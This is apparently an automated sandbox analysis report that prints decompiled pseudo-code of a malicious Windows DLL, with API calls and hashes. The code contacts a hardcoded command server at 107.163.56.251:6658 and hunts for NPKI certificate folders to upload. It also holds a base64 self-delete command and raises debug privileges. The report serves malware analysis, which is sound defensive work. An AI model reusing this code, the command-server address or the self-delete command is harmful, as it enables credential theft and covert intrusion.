            					 *(_t45 + 0x10017ba0) =  *(_t45 + 0x10017ba0) & 0x00000000;
            					return 0x10017ba0;
            				} else {
            					asm("les ecx, [ebx+esi]");
            					asm("fisttp dword [ebp+0x5353b045]");
            					_push(3);
            					_push(__ebx);
            					_push(3);
            					_push(0xc0000000);
            					_push(__eax);
            					__eax = E10021444(__eax, __ebx, __ecx, __edx, __edi, __eflags);
            					__eflags =  *(__ebx - 0x377c10) & __cl;
            					__eflags = __esi - __eax;
            					if(__eflags != 0) {
            						__eax =  &_a4;
            						__eax =  &_v32;
            						__eax = E100273A0(__ebx, __ecx, __edx, __edi, __eflags); // executed
            						__eax =  &_v8;
            						__eax = E100291CB(__ecx, __edx, __ecx, 0x400,  &_v8);
            						0x1003dd50(0x1300, __ebx, __eax, __ebx, __ebx, __esi, __esi, 0x74080, __ebx, __ebx,  &_v32, 0x18,  &_a4, __ebx);
            						__cl = __cl +  *((intOrPtr*)(__edx - 0x3cc518bb));
            						__eflags = __cl;
            						if(__cl > 0) {
            							__al = __al & 0x00000010;
            							__ecx =  &_a4;
            							__al =  ~__al;
            							asm("sbb eax, eax");
            							__al = __al & 0x000000b5;
            							__eax =  &(__eax[0x76]);
            							__edx =  &_v120;
            							__ax & 0x0000ffff =  &_v648;
            							__ecx = __esi;
            							__eax = E10008ABE(__esi,  &_v120,  &_v648, __ax & 0x0000ffff, __ebx,  &_a4);
            							__eflags = __eax;
            							if(__eax != 0) {
            								0x1004120f(__esi, __esi);
            								__ecx =  &_v1672;
            								__eax =  &_v632;
            								__edx = 0x100;
            								do {
            									__esi =  *__eax & 0x0000ffff;
            									__eax =  &(__eax[0]);
            									 *__ecx = __esi;
            									__eax =  &(__eax[0]);
            									__ecx = __ecx + 4;
            									__edx = __edx - 1;
            									__eflags = __edx;
            								} while (__eflags != 0);
            								_t28 = __edi + 0x44; // 0x44
            								__esi = _t28;
            								_push(0x40);
            								_push(__ebx);
            								__eax = E1000CCFC(__ebx, __ecx, _t28, __ebp, __eflags, _t28);
            								__ecx =  &_v1672;
            								_push(0x13);
            								__edx = 0xa;
            								_push(E10008B19(__ecx, __edx));
            								__eax = E1000CD0E(__ecx, __esi);
            								_t30 = __edi + 4; // 0x4
            								__esi = _t30;
            								_push(0x40);
            								_push(__ebx);
            								__eax = E1000CCFC(__ebx, __ecx, _t30, __ebp, __eflags, _t30);
            								__ecx =  &_v1672;
            								_push(0x2e);
            								__edx = 0x1b;
            								_push(E10008B19(__ecx, __edx));
            								__eax = E1000CD0E(__ecx, __esi);
            								__eax = 0;
            								__eflags = 0;
            							} else {
            								_push(0xfffffffd);
            								goto L14;
            							}
            						} else {
            							_push(0xfffffffe);
            							L14:
            							_pop(__eax);
            						}
            					}
            					_pop(__edi);
            					_pop(__esi);
            					_pop(__ebx);
            					return __eax;
            				}
            			}

























            0x10008b8b
            0x10008b95
            0x10008ba5
            0x10008baa
            0x10008b31
            0x10008b32
            0x10008b37
            0x10008b3e
            0x10008b40
            0x10008b41
            0x10008b44
            0x10008b4b
            0x10008b4c
            0x10008b4c
            0x10008b4f
            0x10008b57
            0x10008b59
            0x10008b5d
            0x10008b5f
            0x10008b5f
            0x10008b68
            0x10008b6e
            0x10008b74
            0x10008b74
            0x10008b75
            0x10008b76
            0x10008b5f
            0x10008b7a
            0x10008b88
            0x10008bac
            0x10008bac
            0x10008baf
            0x10008bb5
            0x10008bb7
            0x10008bb8
            0x10008bba
            0x10008bbf
            0x10008bc0
            0x10008bc5
            0x10008bcb
            0x10008bcd
            0x10008bd3
            0x10008bd8
            0x10008be7
            0x10008bed
            0x10008bf8
            0x10008c04
            0x10008c09
            0x10008c09
            0x10008c0f
            0x10008c15
            0x10008c17
            0x10008c1a
            0x10008c1c
            0x10008c1f
            0x10008c22
            0x10008c27
            0x10008c2e
            0x10008c35
            0x10008c37
            0x10008c3c
            0x10008c3e
            0x10008c47
            0x10008c4c
            0x10008c52
            0x10008c58
            0x10008c5d
            0x10008c5d
            0x10008c60
            0x10008c61
            0x10008c63
            0x10008c64
            0x10008c67
            0x10008c67
            0x10008c67
            0x10008c6a
            0x10008c6a
            0x10008c6d
            0x10008c6f
            0x10008c71
            0x10008c79
            0x10008c7f
            0x10008c83
            0x10008c89
            0x10008c8b
            0x10008c90
            0x10008c90
            0x10008c93
            0x10008c95
            0x10008c97
            0x10008c9f
            0x10008ca5
            0x10008ca9
            0x10008caf
            0x10008cb1
            0x10008cb7
            0x10008cb7
            0x10008c40
            0x10008c40
            0x00000000
            0x10008c40
            0x10008c11
            0x10008c11
            0x10008c42
            0x10008c42
            0x10008c42
            0x10008c0f
            0x10008cba
            0x10008cbb
            0x10008cbc
            0x10008cbe
            0x10008cbe

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID: 12071239$C:\Users\user\Desktop$C:\Users\user\Desktop\abc.dll$\\.\PHYSICALDRIVE%d
            • API String ID: 0-1891501486
            • Opcode ID: 72a6a4b8deabb5bb69fdb7b395b36676cf823afa2d40bcd1544f1f2163d78a7d
            • Instruction ID: b68952829e75ed167b111443bcc5e26f53128a89baf0203bc86807cf9169a0e2
            • Opcode Fuzzy Hash: 72a6a4b8deabb5bb69fdb7b395b36676cf823afa2d40bcd1544f1f2163d78a7d
            • Instruction Fuzzy Hash: 874189B65042187AFB21C6609C92FEF376CEB113C4F504165FA85AA0C6EB74AF4683A0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 24%
            			E10007F89(char __ebx, void* __edx, intOrPtr* __esi, void* __fp0) {
            				intOrPtr _t62;
            				int _t63;
            				intOrPtr* _t67;
            				void* _t72;
            				int _t73;
            				intOrPtr* _t83;
            				intOrPtr _t85;
            				int _t93;
            				int _t98;
            				void* _t101;
            				int _t103;
            				intOrPtr _t108;
            				char _t112;
            				signed int _t115;
            				void* _t117;
            				signed int _t121;
            				void* _t128;
            				void* _t134;
            				void* _t135;
            				void* _t138;
            				void* _t140;
            				void* _t148;
            				intOrPtr* _t149;
            				int _t150;
            				intOrPtr* _t151;
            				void* _t153;
            				void* _t155;
            				void* _t163;
            				void* _t165;
            
            				_t165 = __fp0;
            				_t151 = __esi;
            				_t138 = __edx;
            				_t112 = __ebx;
            				_push("\\");
            				_push(_t153 - 0x398);
            				 *__esi();
            				_push("*.*");
            				_push(_t153 - 0x398);
            				 *__esi();
            				_t62 = E1002912D(__ebx, __esi, _t153 - 0x398, _t153 - 0x398, _t153 - 0x4d8); // executed
            				 *((intOrPtr*)(_t153 - 4)) = _t62;
            				if(_t62 != 0xffffffff) {
            					L2:
            					_t63 = _t153 - 0x4d8;
            					0x10036154(_t138,  *((intOrPtr*)(_t153 - 4)), _t63); // executed
            					__eflags = _t63;
            					if(__eflags != 0) {
            						__eflags =  *((char*)(_t153 - 0x4ac)) - 0x2e;
            						if( *((char*)(_t153 - 0x4ac)) != 0x2e) {
            							__eflags =  *(_t153 - 0x4d8) & 0x00000010;
            							if(( *(_t153 - 0x4d8) & 0x00000010) != 0) {
            								__eflags = 0;
            								_t115 = 0x40;
            								_t140 = _t153 - 0x293;
            								 *((char*)(_t153 - 0x294)) = _t112;
            								memset(_t140, 0, _t115 << 2);
            								_t155 = _t155 + 0xc;
            								_t141 = _t140 + _t115;
            								asm("stosw");
            								asm("stosb");
            								0x10036c11(_t153 - 0x294,  *((intOrPtr*)(_t153 + 8)));
            								_t67 = _t140 + _t115 - 0x294;
            								asm("invalid");
            								_push("\\");
            								_pop(_t117);
            								 *_t67 =  *_t67 + _t138;
            								 *_t151(_t67);
            								 *_t151(_t153 - 0x294, _t153 - 0x4ac);
            								_t72 = _t153 - 0x4ac;
            								_push(_t72);
            								_push("NPKI");
            								_push(_t72);
            								_t73 = E100254F0(_t112, _t117, _t138, _t141, _t151);
            								__eflags = _t73;
            								if(_t73 != 0) {
            									L10007F4F(_t138, _t165, _t153 - 0x294); // executed
            								} else {
            									_t121 = 0x3f;
            									 *((char*)(_t153 - 0x5d8)) = _t112;
            									memset(_t153 - 0x5d7, _t73, _t121 << 2);
            									asm("stosw");
            									asm("stosb");
            									_push("12071239");
            									E10003EF4(_t153 - 0x5d8, "%s\\%s", _t153 - 0x294);
            									_push(_t153 - 0x5d8);
            									 *((intOrPtr*)(E10022125(_t153 - 0x5d8, _t112, 0, _t138, _t151, _t165) - 0xbfffffff)) =  *((intOrPtr*)(E10022125(_t153 - 0x5d8, _t112, 0, _t138, _t151, _t165) - 0xbfffffff)) + E10022125(_t153 - 0x5d8, _t112, 0, _t138, _t151, _t165) - 0xbfffffff;
            									_t83 =  *0x8e85700;
            									 *_t83 =  *_t83 + _t83;
            									 *((intOrPtr*)(_t153 - 0x10)) = _t83;
            									_t85 = E10004770(_t153 - 0x294, 0x850fc085, _t138, _t153 - 0x5d7 + _t121, _t165, _t153 - 0x294, _t83, _t153 - 0x5d7 + _t121);
            									_push(0x1f);
            									 *((intOrPtr*)(_t153 - 0xc)) = _t85;
            									 *((char*)(_t153 - 0x90)) = _t112;
            									memset(_t153 - 0x8f, 0, 0x850fc085 << 2);
            									asm("stosw");
            									asm("stosb");
            									_push(0x1f);
            									 *((char*)(_t153 - 0x190)) = _t112;
            									memset(_t153 - 0x18f, 0, 0 << 2);
            									asm("stosw");
            									asm("stosb");
            									_t128 = 0x1f;
            									_t148 = _t153 - 0x10f;
            									 *((char*)(_t153 - 0x110)) = _t112;
            									memset(_t148, 0, 0 << 2);
            									_t149 = _t148 + _t128;
            									asm("stosw");
            									asm("stosb");
            									 *((intOrPtr*)(_t153 - 8)) = 0x50;
            									_t93 = E10005C4C(_t153 - 0x110, 0x80);
            									_t163 = _t155 + 0x1c - 1 + 0x3c;
            									__eflags = _t93;
            									if(_t93 == 0) {
            										_push( &M1001258F);
            									} else {
            										_push(_t153 - 0x109);
            									}
            									E1000CD0E(0, _t153 - 0x90);
            									0x1003775b();
            									_t98 =  *_t149(_t153 - 0x90, 0x2f);
            									__eflags = _t98;
            									if(_t98 != 0) {
            										 *( *_t149(_t153 - 0x90, 0x2f)) = _t112;
            									}
            									_t150 =  *_t149(_t153 - 0x90, 0x3a);
            									__eflags = _t150 - _t112;
            									_pop(_t134);
            									if(__eflags != 0) {
            										 *_t150 = _t112;
            										_t108 = E1000CD0E(_t134, _t153 - 0x190);
            										_t150 = _t150 + 1;
            										__eflags = _t150;
            										0x100354a4(_t138, _t150, _t153 - 0x90);
            										_t163 = _t163 + 0xc;
            										 *((intOrPtr*)(_t153 - 8)) = _t108;
            									}
            									_push( *((intOrPtr*)(_t153 - 0xc)));
            									_push( *((intOrPtr*)(_t153 - 0x10)));
            									_push( *((intOrPtr*)(_t153 - 8)));
            									_t101 = E10001000(_t134, __eflags, _t165, "L2ltYWdlLnBocA==");
            									_pop(_t135);
            									_push(_t101);
            									_push(_t153 - 0x190);
            									_t103 = E10007E03(_t112, _t135, _t150, _t151, __eflags, _t165);
            									_t155 = _t163 + 0x14;
            									__eflags = _t103;
            									if(__eflags != 0) {
            										_push(_t112);
            										_push(_t153 - 0x5d8);
            										E1002E0E4(_t135, _t138, _t150, _t151, __eflags);
            										_pop(es);
            									}
            									 *0x10017b90 = 1;
            									Sleep(0xbb8);
            								}
            							}
            						}
            						goto L2;
            					}
            					0x10040814( *((intOrPtr*)(_t153 - 4)));
            					if(__eflags == 0) {
            						asm("adc [edi+0x5e], bl");
            					}
            					goto L20;
            				} else {
            					_t63 = 0;
            					L20:
            					return _t63;
            				}
            			}
































            0x10007f89
            0x10007f89
            0x10007f89
            0x10007f89
            0x10007f8f
            0x10007f94
            0x10007f95
            0x10007f9d
            0x10007fa2
            0x10007fa3
            0x10007fb4
            0x10007fbc
            0x10007fbf
            0x10007fc8
            0x10007fc8
            0x10007fd3
            0x10007fd8
            0x10007fda
            0x10007fe0
            0x10007fe7
            0x10007fe9
            0x10007ff0
            0x10007ff4
            0x10007ff6
            0x10007ff7
            0x10007ffd
            0x10008006
            0x10008006
            0x10008006
            0x10008008
            0x1000800a
            0x10008012
            0x10008017
            0x1000801c
            0x1000801e
            0x10008020
            0x10008021
            0x10008024
            0x10008034
            0x10008036
            0x1000803c
            0x1000803d
            0x10008042
            0x10008043
            0x10008049
            0x1000804c
            0x100081ea
            0x10008052
            0x1000805a
            0x1000805b
            0x10008061
            0x10008063
            0x10008065
            0x1000806c
            0x1000807e
            0x1000808c
            0x1000809c
            0x1000809e
            0x100080a4
            0x100080a7
            0x100080b2
            0x100080b7
            0x100080b9
            0x100080c5
            0x100080cb
            0x100080cd
            0x100080cf
            0x100080d0
            0x100080db
            0x100080e3
            0x100080e5
            0x100080e7
            0x100080e8
            0x100080eb
            0x100080f1
            0x100080f7
            0x100080f7
            0x100080f9
            0x100080fb
            0x10008108
            0x1000810f
            0x10008114
            0x10008117
            0x10008119
            0x10008124
            0x1000811b
            0x10008121
            0x10008121
            0x10008130
            0x10008135
            0x10008146
            0x10008149
            0x1000814c
            0x1000815a
            0x1000815c
            0x10008168
            0x1000816b
            0x1000816d
            0x1000816e
            0x10008176
            0x10008180
            0x10008185
            0x10008185
            0x10008188
            0x1000818d
            0x10008190
            0x10008190
            0x10008193
            0x10008196
            0x10008199
            0x100081a1
            0x100081a6
            0x100081a7
            0x100081ae
            0x100081af
            0x100081b4
            0x100081b7
            0x100081b9
            0x100081c1
            0x100081c2
            0x100081c3
            0x100081c8
            0x100081c8
            0x100081ce
            0x100081d8
            0x100081d8
            0x1000804c
            0x10007ff0
            0x00000000
            0x10007fe7
            0x100081f8
            0x10008200
            0x10008202
            0x10008202
            0x00000000
            0x10007fc1
            0x10007fc1
            0x10008203
            0x10008207
            0x10008207

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID: *.*$.
            • API String ID: 0-358234090
            • Opcode ID: 1e842e5c8c1ad58366fa87f5798196a6fd66006b81a13b24c003e61169ad0fa4
            • Instruction ID: bf8cbc250889b9ba669e23c0522c0e0e43b025ab8836cd358959c2a0f0221b08
            • Opcode Fuzzy Hash: 1e842e5c8c1ad58366fa87f5798196a6fd66006b81a13b24c003e61169ad0fa4
            • Instruction Fuzzy Hash: C91161B2D0029DBEEF52D7A0DD44ADD7BBCEF45291F1004E6E648E6081DA749B889F60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E10003FB7(int _a4, int _a8) {
            				void* _t3;
            
            				_t3 = CreateToolhelp32Snapshot(_a4, _a8); // executed
            				return _t3;
            			}




            0x10003fbf
            0x10003fc5

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000000,00000000), ref: 10003FBF
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CreateSnapshotToolhelp32
            • String ID:
            • API String ID: 3332741929-0
            • Opcode ID: 52575d3eb3ab59922be1ab4602cb830e029d55bacf89bd0c0cdd206a51f88f2f
            • Instruction ID: 92745056c523567f199991dad2fb0d4ab4f903fb5d7c64995becaa4a73b6ff46
            • Opcode Fuzzy Hash: 52575d3eb3ab59922be1ab4602cb830e029d55bacf89bd0c0cdd206a51f88f2f
            • Instruction Fuzzy Hash: 69A00235404251ABDA415B50CD44D5ABF61BB94741F05C415F19541034C73195A5DB11
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b5ebeb73645924bb769e814257880a44120a8cafd9d08b24bc9cd62ec592b88f
            • Instruction ID: 9392647056415430420877d8d55925c7b4ca55eea7d1033a0f72c8ceea97fbde
            • Opcode Fuzzy Hash: b5ebeb73645924bb769e814257880a44120a8cafd9d08b24bc9cd62ec592b88f
            • Instruction Fuzzy Hash: FA014BB9D11219BEDF11EFA4CC46EEFBBBCEF08250F504421B904E6141E6B4AB018BE0
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 48%
            			E10008656(void* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0, signed int _a12) {
            				void* _v19;
            				char _v20;
            				void _v1043;
            				char _v1044;
            				char _v1444;
            				void* _v1452;
            				void* __ebx;
            				void* __edi;
            				void* __ebp;
            				void* _t15;
            				CHAR* _t18;
            				signed int _t22;
            				void* _t24;
            				void* _t31;
            				intOrPtr* _t39;
            				void* _t40;
            				void* _t43;
            				void* _t48;
            				void* _t52;
            				void* _t53;
            				void* _t56;
            				void* _t59;
            				intOrPtr _t64;
            				void* _t66;
            
            				_t79 = __fp0;
            				_t63 = __esi;
            				_t55 = __edx;
            				_t15 = E10005989(_t43, __ecx, __edx, _t56, __esi, _t66, __eflags, __fp0);
            				0x100337e0(0, 1, "M107.163.56.251:6658", 0x10015a68);
            				asm("daa");
            				0x1003b59a(_t66);
            				if(_t15 != 0xb7) {
            					_t72 = _t15 - 5;
            					if(_t15 != 5) {
            						E100042A2(0, _t72, __fp0, "SeDebugPrivilege", 1); // executed
            						_t24 = E10005986();
            						_t59 = "C:\\Users\\alfons\\Desktop\\12071239";
            						0x1004075a(_t59, __esi);
            						_t64 =  *0x1000e094;
            						if(_t24 == 0) {
            							_t39 = E100044AD(_t24, __edx, 0x35); // executed
            							_pop(_t53);
            							if(_t39 != 0xffffffff) {
            								_t39 = E10004351(_t39, _t53, __edx, __fp0, _t39, "123");
            								_pop(_t53);
            							}
            							0x10030e70(0);
            							_t66 = _t59;
            							asm("adc [esp+edx+0x68], dh");
            							asm("rol byte [edi], 1");
            							 *_t39 =  *_t39 + _t39; // executed
            							Sleep(??); // executed
            							_push(_a12);
            							_t40 = L1002E51E(_t39, _t53, _t66);
            							asm("repe call 0xffffbd83");
            							_t76 = _t40;
            							if(_t40 == 0) {
            								CreateThread(0, 0, E10008578, 0, 0, 0); // executed
            							}
            							E10006DD5(0, _t53, _t55, _t59, _t64, _t76, _t79); // executed
            						}
            						CreateThread(0, 0, E10006EE7, 0, 0, 0); // executed
            						Sleep(0x3e8); // executed
            						0x10033977(0x202,  &_v1444);
            						CreateThread(0, 0, E10006B30, "107.163.56.251:6658", 0, 0); // executed
            						CreateThread(0, 0, E10008208, 0, 0, 0); // executed
            						Sleep(0xbb8); // executed
            						_v20 = 0;
            						asm("stosd");
            						asm("stosd");
            						asm("stosd");
            						asm("stosw");
            						asm("stosb");
            						_t31 = E10005ACA(_t76,  &_v20);
            						_t77 = _t31 - 5;
            						_t52 = _t66;
            						if(_t31 < 5) {
            							CreateThread(0, 0, E10007112, 0, 0, 0); // executed
            						}
            						CreateThread(0, 0, E1000827D, 0, 0, 0); // executed
            						Sleep(0xbb8); // executed
            						CreateThread(0, 0, E1000490F, 0, 0, 0); // executed
            						CreateThread(0, 0, E10006EEF, 0, 0, 0); // executed
            						if(E10004482(_t52, _t77, _t79) == 0) {
            							Sleep(0x927c0); // executed
            							CreateThread(0, 0, 0x10006a7f, 0, 0, 0); // executed
            							Sleep(0x1388); // executed
            							CreateThread(0, 0, E1000842D, 0, 0, 0); // executed
            						}
            						Sleep(0xffffffff); // executed
            						L13:
            						Sleep(0x36ee80);
            						goto L13;
            					}
            				}
            				_v1044 = 0;
            				memset( &_v1043, 0, 0xff << 2);
            				asm("stosw");
            				_push("C:\\Users\\alfons\\Desktop");
            				asm("stosb");
            				_t18 = E10001000(0, __eflags, _t79, "Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=");
            				_pop(_t48);
            				wsprintfA( &_v1044, _t18);
            				_push(0);
            				_t22 = E100255A5(0, _t48,  &_v1043 + 0xff, _t63, _t66, _t55,  &_v1044);
            				__eflags = _a12;
            				if(_a12 != 0) {
            					Sleep(0x7d0);
            					0x10041059(_a12);
            					__eflags = _t22 & 0xc3c95b5f;
            					return _t22;
            				}
            				return _t22;
            			}



























            0x10008656
            0x10008656
            0x10008656
            0x10008661
            0x1000867b
            0x10008680
            0x10008682
            0x1000868c
            0x10008692
            0x10008695
            0x100086a3
            0x100086aa
            0x100086af
            0x100086b5
            0x100086bb
            0x100086c3
            0x100086c7
            0x100086cf
            0x100086d0
            0x100086d8
            0x100086de
            0x100086de
            0x100086e1
            0x100086e8
            0x100086e9
            0x100086ed
            0x100086ef
            0x100086f1
            0x100086f7
            0x100086fa
            0x100086ff
            0x10008705
            0x10008707
            0x10008713
            0x10008713
            0x10008715
            0x10008715
            0x10008724
            0x10008731
            0x10008740
            0x10008753
            0x1000875f
            0x10008766
            0x1000876d
            0x10008770
            0x10008771
            0x10008772
            0x10008773
            0x10008775
            0x1000877a
            0x1000877f
            0x10008782
            0x10008783
            0x1000878f
            0x1000878f
            0x1000879b
            0x100087a8
            0x100087b4
            0x100087c0
            0x100087cf
            0x100087d6
            0x100087e2
            0x100087e9
            0x100087f5
            0x100087f5
            0x100087f9
            0x100087fc
            0x10008801
            0x00000000
            0x10008801
            0x10008695
            0x10008812
            0x10008818
            0x1000881a
            0x1000881c
            0x10008826
            0x10008827
            0x1000882c
            0x10008835
            0x10008844
            0x10008847
            0x1000884c
            0x1000884f
            0x10008856
            0x1000885f
            0x10008864
            0x00000000
            0x10008864
            0x10008868

            APIs
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 100059AE
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 100059FB
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A08
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A19
            • Sleep.KERNEL32(00000000,C:\Users\user\Desktop\12071239,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 100086F1
            • CreateThread.KERNEL32(00000000,00000000,10008578,00000000,00000000,00000000), ref: 10008713
            • CreateThread.KERNEL32(00000000,00000000,10006EE7,00000000,00000000,00000000), ref: 10008724
            • Sleep.KERNEL32(000003E8,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 10008731
            • CreateThread.KERNEL32(00000000,00000000,10006B30,107.163.56.251:6658,00000000,00000000), ref: 10008753
            • CreateThread.KERNEL32(00000000,00000000,10008208,00000000,00000000,00000000), ref: 1000875F
            • Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 10008766
            • CreateThread.KERNEL32(00000000,00000000,10007112,00000000,00000000,00000000), ref: 1000878F
            • CreateThread.KERNEL32(00000000,00000000,1000827D,00000000,00000000,00000000), ref: 1000879B
            • Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 100087A8
            • CreateThread.KERNEL32(00000000,00000000,1000490F,00000000,00000000,00000000), ref: 100087B4
            • CreateThread.KERNEL32(00000000,00000000,10006EEF,00000000,00000000,00000000), ref: 100087C0
            • Sleep.KERNEL32(000927C0,?,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 100087D6
            • CreateThread.KERNEL32(00000000,00000000,10006A7F,00000000,00000000,00000000), ref: 100087E2
            • Sleep.KERNEL32(00001388,?,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 100087E9
              • Part of subcall function 100044AD: GetExtendedUdpTable.IPHLPAPI(00000000,?,00000001,00000002,00000001,00000000,?,00000000,iphlpapi.dll,C:\Users\user\Desktop\12071239,751443E0,00000000), ref: 100044E9
            • CreateThread.KERNEL32(00000000,00000000,1000842D,00000000,00000000,00000000), ref: 100087F5
            • Sleep.KERNEL32(000000FF,?,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 100087F9
            • Sleep.KERNEL32(0036EE80,00000202,?,?,?,00000000,00000001,M107.163.56.251:6658,10015A68), ref: 10008801
            • wsprintfA.USER32 ref: 10008835
            • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008856
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CreateThread$Sleep$wsprintf$ExtendedTable
            • String ID: 107.163.56.251:6658$123$C:\Users\user\Desktop$C:\Users\user\Desktop\12071239$M107.163.56.251:6658$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
            • API String ID: 2017569163-3242930679
            • Opcode ID: 5eddfbfb2886de8fa0f4fbffde14f3620d22a276abf96e1261f835aff45dc5ad
            • Instruction ID: 562cb21c62d1d749736fc9fe061952e86694a01f598b035fd930608b54173050
            • Opcode Fuzzy Hash: 5eddfbfb2886de8fa0f4fbffde14f3620d22a276abf96e1261f835aff45dc5ad
            • Instruction Fuzzy Hash: 8B51BEE150435CBEF710E7788CC5EBB3A9CEF442D9F11092AF255A508ADFB4AD408A76
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 46%
            			E10006EEF() {
            				signed int _v8;
            				void _v267;
            				signed char _v268;
            				void _v527;
            				signed char _v528;
            				void _v783;
            				signed char _v784;
            				void _v1807;
            				signed char _v1808;
            				void _v5903;
            				signed char _v5904;
            				void* _t47;
            				void* _t48;
            				void* _t49;
            				void* _t53;
            				void* _t65;
            				signed int _t71;
            				signed int _t76;
            				signed int _t90;
            				void* _t94;
            				void* _t95;
            				void* _t96;
            				signed int _t100;
            				void* _t102;
            				void* _t109;
            				signed int _t110;
            				void* _t117;
            				void* _t118;
            				signed int _t130;
            				intOrPtr* _t132;
            				void* _t134;
            				char** _t135;
            				char** _t138;
            				char** _t140;
            				void* _t143;
            				void* _t146;
            
            				E1000CD20(0x170c, _t96);
            				_push(_t94);
            				_t132 = E10001000(_t96, _t143, _t146, "QVNEU3ZjLmV4ZQ==");
            				 *_t135 = "QVlSVFNydi5heWU="; // executed
            				_t47 = E10001000(_t96, _t143, _t146, _t117); // executed
            				_t118 = _t47;
            				while(1) {
